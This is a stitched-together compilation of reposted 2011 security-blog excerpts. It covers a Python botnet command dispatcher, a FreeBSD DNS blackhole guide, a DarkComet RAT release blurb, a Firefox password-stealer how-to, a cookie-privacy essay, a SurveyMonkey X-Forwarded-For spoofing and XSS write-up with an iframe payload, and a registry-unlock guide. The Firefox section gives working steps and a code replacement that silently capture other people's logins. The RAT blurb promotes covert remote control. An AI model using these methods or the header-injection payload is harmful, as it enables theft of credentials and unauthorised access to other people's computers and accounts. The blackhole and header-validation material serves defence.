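                continue
            return callback(**m.groupdict())
        return None

    def status_report(self):
        return str(len(self.task_queue))

    def echo(self, text):
        return text

    def get_time(self, format=None):
        now = datetime.datetime.now()
        if format:
            return now.strftime(format)
        return str(now)
```

Because the match is anchored to the whole task string, an operator typo ("statusx") is ignored rather than partially executed; the real worker uses greedy `.*` groups for run and download, so there anything after the command word is passed straight through.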

Source: http://charlesleifer.com/blog/simple-botnet-written-python/

Building a DNS Blackhole with FreeBSD

If you want the full article, please go to the Source.

This document will outline how to setup FreeBSD to act as a DNS Blackhole (DNSBH).

What is a DNS Blackhole and why would I want one?
A DNS blackhole (DNSBH) in its simplest form is just a box running BIND that is authoritative for a list of malicious domains. When a client asks for a 'flagged' domain, the answer points it either back at itself (localhost) or at a safe local address that explains to the user why they ended up where they did.

How to configure BIND

1) Edit /etc/rc.conf. The IP address of this server is written as <server address> throughout; substitute your own. Enable named here as well, otherwise /etc/rc.d/named start in step 6 will refuse to run:
ifconfig_bge0="inet <server address> netmask <netmask>"
named_enable="YES"

Save and exit the file.

2) Edit /etc/hosts so the box knows its own names (the loopback lines are the FreeBSD defaults with the bhdns alias added):
::1               localhost localhost.my.domain bhdns
127.0.0.1         localhost localhost.my.domain bhdns
<server address>  bhdns.mydomain.ca bhdns

Save and exit the file.

3) Edit /etc/resolv.conf and add the following (nameserver takes an address, not a name; list this box first so that it resolves through its own blackhole):
domain mydomain.ca
nameserver <server address>
nameserver <upstream provider>

Save and exit the file.

4) Now take a look at /etc/namedb/named.conf. The file is well documented. These are the changes/additions that you should make:

In the options section you need to add an entry to allow clients access. This fictitious install is on a 10 network so it would look like:
allow-query { 10.0.0.0/8; };

Next you want to set the address that the service will listen on. Use the same address you set in rc.conf:

listen-on { <server address>; };

Now you can set up a forwarder, in my case the same one used in /etc/resolv.conf:

forwarders { <upstream provider>; };

This isn't a requirement but by using a forwarder you will take advantage of a more local cache which will increase performance.

Finally, outside the options block, include the list of blackholed zones (fetched in the next step):
include "/etc/namedb/blackhole/spywaredomains.zones";

5) Create a folder called blackhole (same location you specified above) and fetch the zonefile:
~# mkdir /etc/namedb/blackhole
~# cd /etc/namedb/blackhole
~# fetch http://www.malwaredomains.com/files/spywaredomains.zones

This file contains entries that look like:
zone "razdrochi.ru" {type master; file "/etc/namedb/blockeddomain.hosts";};

With this loaded, any client request for razdrochi.ru will be redirected to whatever we have set up in /etc/namedb/blockeddomain.hosts. Essentially, all we are doing is mapping all of the domains listed in that file to the same DNS (A) record.

Lets create this record now.

6) Edit /etc/namedb/blockeddomain.hosts and start the service. The file is shared by every blackholed zone, so @ stands for whichever domain is being looked up. Note that a wildcard record does not cover the bare domain itself, which is why there is an explicit A record for @ as well as for *, and that BIND will not load a master zone without a serial and an NS record:
; This zone will redirect all requests back to the blackhole itself.

$TTL 86400 ; one day

@ IN SOA bhdns.mydomain.ca. bhdns.mydomain.ca. (
        <serial> ; serial, e.g. YYYYMMDDnn; increase it whenever this file changes
        28800 ; refresh 8 hours
        7200 ; retry 2 hours
        864000 ; expire 10 days
        86400 ) ; min ttl 1 day

@ IN NS bhdns.mydomain.ca.
@ IN A <server address>
* IN A <server address>

Note: You can redirect the request to anywhere you wish but it is worthwhile to send the user to a place that explains what just happened. If not, the user might get confused and open a vague "The Interweb is broken" helpdesk ticket.

Run named-checkconf on the configuration before starting; a syntax error in the fetched zone list would otherwise leave you without a resolver. Then:
~# /etc/rc.d/named start

For debugging (or other) reasons it might be worth it to separate named logs from the syslog catchall. To do this, edit /etc/syslog.conf and add a program block, so that only named's messages (and not everything) go to the new file:
!named
*.* /var/log/named.log

Save and exit the file and then:
~# touch /var/log/named.log
~# /etc/rc.d/syslogd restart

How to automate the update process

The getzones.sh script does the following:
1) Fetches the zonefile
2) Compares it with the current file; if there are no changes, it exits. If there are, it
3) Makes a note of the additions/removals
4) Puts the new zonefile in place
5) Restarts the service
6) Emails the changes to an admin

If you want to get the script, please go to the Source.

1) Download getzones.sh:
~# cd /etc/namedb/blackhole
~# fetch http://www.pintumbler.org/getzones.sh
~# chmod +x /etc/namedb/blackhole/getzones.sh

2) Create the temp directory:
~# mkdir /etc/namedb/blackhole/work

3) Add an entry to root's crontab to run the script daily:

~# crontab -e

Once the editor comes up, input the following line (note the five time fields: minute, hour, day of month, month, day of week):
0 0 * * * /etc/namedb/blackhole/getzones.sh > /dev/null 2>&1

This will update the file every day at midnight.

My bash is pretty shoddy so you might want to test it out first :)
~# /etc/namedb/blackhole/getzones.sh
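Steps 2 and 3 of the update process, plus a check the script above does not make, as an added example (this is not the author's getzones.sh): the zone list arrives over plain HTTP and is included straight into named.conf, so before it is put in place every line should be verified to be a zone statement pointing at our blockeddomain.hosts file and nothing else (no include, no options block, no zone pointing at another file). The input below is constructed; the file layout it assumes is the one shown above, one zone statement per line.

```python
import re

# One BIND zone statement per line, all pointing at the shared sinkhole zone file.
# Anything else in a downloaded list is refused rather than handed to named.
ZONE_LINE = re.compile(
    r'^\s*zone\s+"(?P<name>[A-Za-z0-9][A-Za-z0-9.-]*)"\s*'
    r'\{\s*type\s+master;\s*file\s+"/etc/namedb/blockeddomain\.hosts";\s*\};\s*$'
)


def parse_zones(text):
    """Return the set of blocked domains in a spywaredomains.zones-style file.

    Raises ValueError on any line that is not a zone statement, a comment or
    blank. A list fetched over HTTP must not be able to add arbitrary
    directives to the BIND configuration.
    """
    domains = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(('//', '#', ';')):
            continue
        m = ZONE_LINE.match(line)
        if m is None:
            raise ValueError('line %d is not a blackhole zone statement: %r' % (lineno, line))
        domains.add(m.group('name').lower())
    return domains


def zone_changes(current_text, new_text):
    """(added, removed) domain lists between the installed file and the download.

    Both lists empty means the new file needs no action (step 2 of the script);
    otherwise they are what step 6 would mail to the admin.
    """
    current = parse_zones(current_text)
    new = parse_zones(new_text)
    return sorted(new - current), sorted(current - new)


def change_report(added, removed):
    """Plain-text body for the notification mail."""
    return '\n'.join(['+ ' + d for d in added] + ['- ' + d for d in removed])


# Constructed sample data (not from malwaredomains.com).
CURRENT = '''\
// current list
zone "razdrochi.ru" {type master; file "/etc/namedb/blockeddomain.hosts";};
zone "bad.example" {type master; file "/etc/namedb/blockeddomain.hosts";};
'''
NEW = '''\
zone "razdrochi.ru" {type master; file "/etc/namedb/blockeddomain.hosts";};
zone "worse.example" {type master; file "/etc/namedb/blockeddomain.hosts";};
'''
# A tampered download: a stray include directive, and a zone served from another file.
TAMPERED = NEW + 'include "/etc/namedb/named.conf.local";\n'
WRONG_FILE = NEW + 'zone "evil.example" {type master; file "/etc/passwd";};\n'
```

In the script, the equivalent check would run right after the fetch, with named-checkconf as a second line of defence before the service is restarted.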

How to setup Apache to provide an information page

As I mentioned earlier, to avoid confusion it is a good idea to send the users to an information page. You can use any web server here; Apache is overkill, but it's what I know.

1) Install Apache. You can do this however you wish, I will just use the ports tree:

~# cd /usr/ports/www/apache22; make install clean

2) Edit /usr/local/etc/apache22/httpd.conf and make the following changes (in order of appearance), using the same address as in rc.conf:
Listen <server address>:80
ServerAdmin atech@mydomain.ca
DocumentRoot "/usr/local/www/dnsbh"
ErrorDocument 500 /404.html
ErrorDocument 404 /404.html
ErrorDocument 402 /404.html

3) Create the web directory:
~# mkdir /usr/local/www/dnsbh
4) Create /usr/local/www/dnsbh/index.html. This will be the main landing page when folks are redirected:
<!DOCTYPE html>
<html>
<head>
<title>Your Org Name - IT services</title>
<script type="text/javascript">var url = parent.window.location.href;</script>
</head>
<body>
<h3>Security Notice...</h3>

<p>You have been redirected to this page because the website that you tried to visit has been known to harbor
or distribute Spyware, Viruses or other forms of malicious software.</p>

<p>As part of our Information Security Policy we maintain a listing of potentially harmful sites to assist in the protection and stability of our computing resources. This is also done to protect users from divulging personal information to third parties where it could be used for illicit purposes such as Spam or Fraud.</p>

<p>If you feel your access to this web site is a requirement, contact your local Information Technology Services department for assistance.</p>
</body>
</html>

5) Create /usr/local/www/dnsbh/warn.png. This image should be around 127 X 57 pixels and contain something that identifies your organization along with something that conveys 'warning' either through words or images.

6) Create /usr/local/www/dnsbh/404.html. Since any path on a blocked domain lands on this server, this catch-all just shows the warning image, which links back to the explanation:
<!DOCTYPE html>
<html><body>
<a href="/index.html" target="_new"><img border="0" src="/warn.png" alt="Security notice"></a>
</body></html>

7) Enable and start the web server: add apache22_enable="YES" to /etc/rc.conf and run /usr/local/etc/rc.d/apache22 start.

Monitoring examples and ideas
The examples below (the graphs themselves are not reproduced here) are simply trending connections to port 80 on the blackhole.

The shortcomings of this solution aside, that second image is quite compelling. You don't even need an analyst to interpret it. This is the kind of stuff that can be easily offloaded because the message is so poignant.

This example shows a typical day of activity:

This shows an infection:

A nice summary table like the one below is very useful. It is important not to focus just on hits but on how much data a client is trying to send out. Large payloads repeatedly sent to this device should be an instant alarm.

Keep in mind too that this is a web server people are connecting to, which means: LOGS! Aside from the fact that we can use these to clarify events, the data is screaming to be mined. I am not quite there yet, but soon.
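The summary table and the "large payloads repeatedly sent" rule above, turned into a script that runs over the blackhole's Apache access log. This is an added example, not the author's monitoring setup. It assumes a custom LogFormat with mod_logio's %I field so that the bytes the client sent (not just the bytes served) are recorded; the log lines are constructed, and the thresholds are placeholders to tune against your own baseline.

```python
import re
from collections import defaultdict

# Assumed LogFormat for the blackhole vhost (mod_logio loaded):
#   LogFormat "%h %t \"%r\" %>s %I %O \"%{Host}i\"" dnsbh
# fields: client, timestamp, request line, status, bytes in, bytes out, Host header
LINE = re.compile(
    r'^(?P<client>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes_in>\d+) (?P<bytes_out>\d+) "(?P<host>[^"]*)"$'
)

# Constructed sample: one user who clicked a blocked link and read the warning
# page, and one host that keeps POSTing 64 KB blobs to a C2 name that now
# resolves to the blackhole.
SAMPLE_LOG = """\
10.1.2.3 [21/Apr/2011:10:41:16 -0400] "GET / HTTP/1.1" 200 412 1830 "razdrochi.ru"
10.1.2.3 [21/Apr/2011:10:41:17 -0400] "GET /warn.png HTTP/1.1" 200 388 2200 "razdrochi.ru"
10.1.9.9 [21/Apr/2011:10:42:03 -0400] "POST /gate.php HTTP/1.1" 404 65536 510 "c2.example"
10.1.9.9 [21/Apr/2011:10:42:08 -0400] "POST /gate.php HTTP/1.1" 404 65536 510 "c2.example"
10.1.9.9 [21/Apr/2011:10:42:13 -0400] "POST /gate.php HTTP/1.1" 404 65536 510 "c2.example"
10.1.9.9 [21/Apr/2011:10:42:18 -0400] "POST /gate.php HTTP/1.1" 404 65536 510 "c2.example"
"""


def summarize(log_text):
    """Per-client totals: hits, bytes sent by the client, blocked names contacted."""
    summary = defaultdict(lambda: {'hits': 0, 'bytes_in': 0, 'hosts': set()})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m is None:
            continue  # unparsable line: skip rather than guess
        entry = summary[m.group('client')]
        entry['hits'] += 1
        entry['bytes_in'] += int(m.group('bytes_in'))
        entry['hosts'].add(m.group('host').lower())
    return dict(summary)


def flag_clients(summary, max_hits=50, max_bytes_in=1024 * 1024):
    """Clients worth a ticket: too many hits, or too much data pushed at the sinkhole.

    A user who follows a bad link produces a handful of small GETs; an infected
    host beaconing or exfiltrating produces many requests, large requests, or
    both. Returns [(client, [reasons])], largest sender first.
    """
    flagged = []
    for client, e in summary.items():
        reasons = []
        if e['hits'] > max_hits:
            reasons.append('%d hits to %d blocked names' % (e['hits'], len(e['hosts'])))
        if e['bytes_in'] > max_bytes_in:
            reasons.append('%d bytes sent to the blackhole' % e['bytes_in'])
        if reasons:
            flagged.append((client, reasons))
    flagged.sort(key=lambda item: summary[item[0]]['bytes_in'], reverse=True)
    return flagged


def report(log_text, **thresholds):
    """One line per flagged client, ready for the daily e-mail."""
    return ['%s: %s' % (client, '; '.join(reasons))
            for client, reasons in flag_clients(summarize(log_text), **thresholds)]
```

Hits alone would rank the two clients as 2 versus 4 and look like noise; the bytes-in column is what separates a curious user from a host trying to ship data to a domain that no longer exists for it.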


Being a little short-handed at work, this was one of the first security solutions that I gravitated towards. The passiveness (and price) just made sense. A DNSBH can dramatically improve an organization's overall security posture for next to nothing. Yes, understand that it is NOT going to help you deal with intelligent threats, but you know what? That doesn't really matter, because most aren't. It also only catches clients that actually use this resolver, so block outbound port 53 to anything other than the blackhole at the firewall, or malware that carries its own resolver address simply walks around it.
The sludge, the unworthy: that is where this solution shines. If you are short on time and short on resources, this is a gift.

Source: http://www.pintumbler.org/Code/dnsbl

DarkComet-RAT v.3.3 Released

If you want to see change log or download application, please go to the Source.

DarkComet-RAT (Remote Administration Tool) is software designed to control, in the best conditions and with the most comfort possible, any kind of Microsoft Windows machine since Windows 2000. This software allows you to perform hundreds of functions stealthily and remotely, without any kind of authorisation in the remote process. It is a long-running project, started in August 2008; DarkComet-RAT is now one of the best and most stable RATs ever made, and it is totally free.

Source: http://security-sh3ll.blogspot.com/2011/04/darkcomet-rat-v33-beta-released.html

Turn Your Firefox Into A Keylogger Without Any Software !

Here we learn how to turn Mozilla Firefox into an undetectable (FUD) keylogger. The modified Firefox stores every username and password a user enters, so that you can get at your friends' accounts whenever they use your machine. The most interesting part is that the whole process is done without installing any extra software.
So let's follow a few easy steps to turn Firefox into a password stealer:

1) Close Firefox

2) Navigate to:

Windows - C:\Program Files\Mozilla Firefox\components
Mac - Applications > right-click Firefox > Show Package Contents > Contents/MacOS/components

3) Find the script named nsLoginManagerPrompter.js.

4) Now download the replacement file linked at the Source, unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it; it is one I have already edited and it works.

From now on, when someone logs onto any site, their username and password will be saved automatically, without the "remember password" prompt.

To retrieve the account information, make sure Firefox is open, go to Tools > Options... > Security tab > click on Saved Passwords, then click on Show Passwords, and press Yes.

Using Firefox 4.0:
Edit nsLoginManagerPrompter.js, which is normally located in C:\Program Files\Mozilla Firefox\components\.
Replace the code from lines 800 - 869 (the body of the function that shows the save-password notification, which receives the login as aLogin) with:
var pwmgr = this._pwmgr; pwmgr.addLogin(aLogin);
Save and replace the original file. Note that a Firefox update will overwrite the modified file and bring the prompt back.

Source: http://topone2u.blogspot.com/2011/04/turn-your-firefox-into-keylogger.html

Cookies and Your Privacy: Past, Present and Future

Cookies were first introduced to the internet as a method for web pages to remember a visitor.
They were used to store things such as passwords, user names, or the contents of an online shopping cart after the browser left a certain page. So when the user returned to the page, they would not have to re-enter their password or refill their shopping cart.
Through the use of cookies, the web page would remember their previous visit and it would be as if they had never left the page in the first place.
However, as the internet has continued to develop, so have cookies. Now they are shared amongst linked web pages to help profile users and track their movements over the world wide web.


Cookies are best described as a piece of text stored on a user's computer by their web browser. When Lou Montulli, then an engineer at Netscape, first introduced cookies to the web in 1994, they were intended to make the browsing experience easier for the user by implementing a virtual shopping cart.

With the ability of a website to remember specific visitors through cookies, the site could store and remember what the visitor was shopping for. Even after leaving the site, the user could return and pick up right where they had left off, making the internet shopping experience much more user friendly.

As cookies progressed and developed further, they began to take on new tasks, such as remembering the user names and passwords of users, making signing into websites much easier.

However, as the general public became more aware of cookies throughout the late 1990s, their downside began to surface. In 1996, cookies began to receive media attention due to their potential privacy issues.
If web sites can store information about specific users, what else are they capable of keeping tabs on? And furthermore, in what other ways is this information being used?

Strategic Planning Assumptions

-For personal use, people using the internet will have to decide what is more important to them, simplicity or privacy?

-In the near future, companies will undoubtedly make their employees use an internet browser that disables cookies. For a business, not protecting a customer's personal information could lead to major legal problems. This possibility can be eliminated by disabling cookies.

-If restrictions on cookies become commonplace on the internet, the Interactive Advertising Bureau will be forced to make major changes to the way its members obtain information about internet users. This could potentially alter the entire structure of internet advertising as we know it today.


Throughout the development and advancement of cookies they have continued to take on more tasks and responsibilities. Where they were originally intended to make the web browsing experience easier, many would now question their impact on privacy.

With the different types of cookies being used on the internet today, an individual's personal preferences are now not only being stored, but also being shared amongst different websites.
For example, third-party cookies are now something that all internet users should be aware of. Third-party cookies have introduced the idea of behavioral targeting, by allowing different sites to share the information stored in cookies.
For instance, when users research Barack Obama on one site, and then visit another site where an ad pops up selling a Barack Obama biography, they have been the target of a third-party cookie.

The easiest way to get rid of cookies and prevent behavioral targeting is to delete the cookies currently on your personal computer.

Cookies are essentially just text files that are stored, so deleting them is pretty simple. They do not have the same properties as viruses, so they do not replicate themselves; however, some newer tracking techniques do resist being deleted.
Flash cookies, for instance, are used to respawn ordinary cookies after the user has deleted them, without the user ever knowing. Ultimately, the most effective way to minimize cookies on your personal computer is through the settings in your internet browser.
By selecting the option to "disable cookies completely," a person can rid their personal computer of cookies. However, this also eliminates the positives of cookies, such as remembering user names and passwords.


-Enabling cookies makes surfing the web much easier and provides a more satisfying user experience. Cookies help to eliminate the process of repeatedly inputting information to websites that a user frequently visits.

-At the same time these cookies are monitoring the activities and interests of individual users. Also, personal information such as an address or phone number can be stored and shared through cookies.

-Restrictions on cookies have not gone unchallenged. The Interactive Advertising Bureau, whose members generated ad spending of about $20.12 billion in 2010, contends that they would not survive with a prior-consent rule in place.

-Other websites such as facebook.com, google.com, and amazon.com contend that a prior consent rule would be costly and disruptive “to the detriment of website users.”

Key Findings

-Cookies are continuously being developed and altered to more effectively track the activities of individual internet users. Flash cookies make deleting cookies off your computer more difficult while third party cookies are shared amongst different advertising websites to more effectively appeal to a person’s interests.

-Currently cookies are a hot button issue. Most of the major web browsers such as Firefox and Internet Explorer are in the process of developing a regulated “do not track” tool.

-The European Union is also working on a mandate that would force web browsers to obtain consent before tracking users through cookies. This, however, is still being argued over, because different countries are interpreting the rules differently. The debate is over whether internet users should have to opt in (agree to cookies) or opt out (deny them).


-Enable the “disable cookies completely” option for your web browser. Doing so will eliminate cookies from your personal computer and keep your personal information private.

This will require you to repeatedly enter user names and passwords, but ultimately those extra few seconds are not as important as keeping your personal information private.

-Educate yourself with the current state of cookies. Currently the issue of cookies and internet privacy is up for debate amongst all of the major web browsers. By staying up to date you can ensure that you will not fall victim to the latest version of cookies.

-Know your web browser. Get familiar with its options and capabilities. Safari in Apple's upcoming OS X Lion, due this summer, will have a "do not track" privacy tool. Internet Explorer and Firefox, on the other hand, are still implementing a similar option.

Source: https://www.infosecisland.com/blogview/13304-Cookies-and-Your-Privacy-Past-Present-and-Future.html

SurveyMonkey: IP Spoofing

When somebody fills out a survey on the SurveyMonkey website, the site records a number of pieces of metadata along with the survey answers: things like date, time, the link used to access the survey, and the IP address of the person completing the survey. This last piece of data was the one that really caught my attention, especially when I started seeing a number of RFC1918 addresses in the mix. That's a bit weird... why, and more interestingly, how are they getting these local addresses?
A lot of thoughts went through my mind... client-side Java checking for the local address maybe, something like decloak. Still, that wouldn't account for the fact that only occasional responses had the private address, while others had the public address (about 5-6 in the 100 responses I looked at).
So, firing up Burp Suite, I threw a couple of fake survey responses at SurveyMonkey for testing and quickly found that the remote system was picking up my public, Internet-routable address on all my test responses. No funky JavaScript, no Java (at all), so it had to be something in the request from the client to the server. Looking at the various options, I started playing about with the X-Forwarded-For and X-Real-IP request headers and quickly discovered that by setting an X-Forwarded-For header on the survey traffic I could set any IP address I wanted on the response.
host: surveymonkey.com
User-Agent: Mozilla/5.0
X-Forwarded-For: <any address you like>
Well, that's a bit of fun... I can set RFC1918 addresses... how totally fun, and at the same time useless. So, taking this one step further, I thought: what would be possible with this? I can spoof the IP address of a person filling out a survey. Well, maybe I could specify a public IP address other than my own in this header too. If they're not checking the string, maybe I can spoof a survey response from somebody who didn't fill it out. Not really a BIG impact, but if I fill out an anti-government survey from a White House IP address, I'm sure it'll cause a bit of a stir. So, let's see if I can fill out this survey from China... after all, if the IP says China, it must be them, right ;)
OMG... China is all up in my survey, APTing me! (The address I used is in one of the IP ranges assigned to China.) Still, aside from framing nation states for filling in nasty comments on your surveys, what else can you do with this?
I'm so glad you asked. Just because the X-Forwarded-For header is meant for transporting the IP addresses of clients doesn't mean that's what we're going to put in there!
The IP address is returned to the owner of the survey and, as such, is only viewable by authenticated users. I'm sure there are also places where this IP address is shown to administrators, support staff, etc., but that's not something I was able to check. So, how about we put in something other than an IP address? Something simple to prove the point... some kind of alert box maybe.
Well, no. Not because it's filtered, though. In the case of SurveyMonkey, the returned data is truncated to 20 characters; anything longer is stripped. So anything flashy is pretty much out of the question. Actually, almost anything interesting is out of scope, unless you happen to own a domain name that's 5 characters long (in total). Sadly, I only own a domain that's 6 characters (c22.cc), which is a pity.
Still, I threw together a quick PoC that loads an iframe from another site. An attacker (given a suitable domain name) could use this to load JavaScript using script src instead of iframe src; either tag fits in exactly 20 characters with a 5-character domain. Not really the kind of PoC I was hoping for, but it proves the point I guess.
host: surveymonkey.com
User-Agent: Mozilla/5.0
X-Forwarded-For: <iframe src=//aa.bb>
I contacted SurveyMonkey with the information discovered and they've begun looking into correcting the issue. The question that really interests me is how many other sites are using the same system and trusting user-provided headers. This is something that webapp testers "should" be testing for. Still, there are lots of things that testers "should" be doing!
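The naive handling described above, beside the way a site behind reverse proxies should read X-Forwarded-For. This is an added example, not SurveyMonkey's code or the author's PoC. It assumes the application's own proxies live on 10.0.0.0/8 (a placeholder); only a header delivered by one of those proxies is consulted, the chain is walked from the right so that a client cannot prepend addresses of its choosing, and any hop that is not an IP address causes the whole header to be ignored, which is what keeps `<iframe src=//aa.bb>` out of the survey owner's page. A proxy on the respondent's side that appends an internal address to the header is also exactly what would produce the RFC1918 entries noticed above.

```python
import ipaddress

# Assumption for the example: the application sits behind reverse proxies
# on the 10.0.0.0/8 network; nothing else may speak for the client.
TRUSTED_PROXIES = (ipaddress.ip_network('10.0.0.0/8'),)


def _trusted(addr, proxies):
    return any(addr in net for net in proxies)


def client_ip_naive(remote_addr, xff):
    """What the post describes: the header, if present, is taken at face value.

    Whoever sends the request chooses what gets stored: an RFC1918 address,
    an address in a Chinese range, or '<iframe src=//aa.bb>'.
    """
    return xff if xff else remote_addr


def client_ip(remote_addr, xff, proxies=TRUSTED_PROXIES):
    """Return the client address as a validated IP string.

    X-Forwarded-For is a comma-separated chain in which each proxy appends
    the peer it saw. Only a chain delivered by one of our own proxies is
    looked at, and it is read from the right: hops that are our proxies are
    skipped, and the first hop that is not one is the client. Anything that
    is not an IP address aborts the walk and the TCP peer is used instead,
    so markup in the header never reaches storage or a browser.
    """
    peer = ipaddress.ip_address(remote_addr)  # the TCP peer is not user-controlled
    if not xff or not _trusted(peer, proxies):
        return str(peer)
    for hop in reversed(xff.split(',')):
        try:
            addr = ipaddress.ip_address(hop.strip())
        except ValueError:
            return str(peer)  # garbage in the chain: trust none of it
        if not _trusted(addr, proxies):
            return str(addr)
    return str(peer)  # every hop was one of ours; nothing beyond the peer to report
```

The 20-character truncation the post mentions limits what an injected string can do, but it is not a defence: validating the value as an address (and still HTML-escaping it wherever it is rendered) is.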

How to Enable Registry disabled by Administrator

What is Registry?
The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. It contains settings for low-level operating system components as well as the applications running on the platform: the kernel, device drivers, services, SAM, user interface and third party applications all make use of the registry. The registry also provides a means to access counters for profiling system performance.
Most of you will have heard the registry called the "brain of Windows". It stores configuration as keys, each of which holds values of a particular type (DWORD, string, binary, multi-string and so on) that carry data in the form the name suggests.

How to enable the Registry disabled by Administrator?
The following message is usually displayed when your system is infected by some virus that changes a registry value, so that you get the error "Registry editing has been disabled by your administrator". To fix it you also have to edit the registry, but since the registry editor has been disabled you cannot open it directly. Instead, create a registry file that merges the corrected DWORD value into the registry database.

Steps to enable registry:
1. Open Notepad.
2. Copy the code below and paste it into Notepad. The value it resets is the one controlled by the group policy described in the next section; 0 re-enables the registry tools.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

3. Now save the Notepad file as anything.reg, and remember to select the file type "All Files" while saving; otherwise it will be saved as anything.reg.txt and you will not be able to merge it.

4. Now close Notepad, double-click the file and click Yes, then OK, to merge it. If Windows refuses with the same "disabled by your administrator" message (the policy can block regedit.exe even when it is only merging a file), set the value from a command prompt with reg.exe, which is not affected by that policy:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
Some malware also sets the same value under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System; check there too.

How to do it using GPEDIT.MSC
Just follow this (gpedit.msc is not included in the Home editions of Windows, where the registry file above is the way to go):
Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> right-click, Properties -> Disabled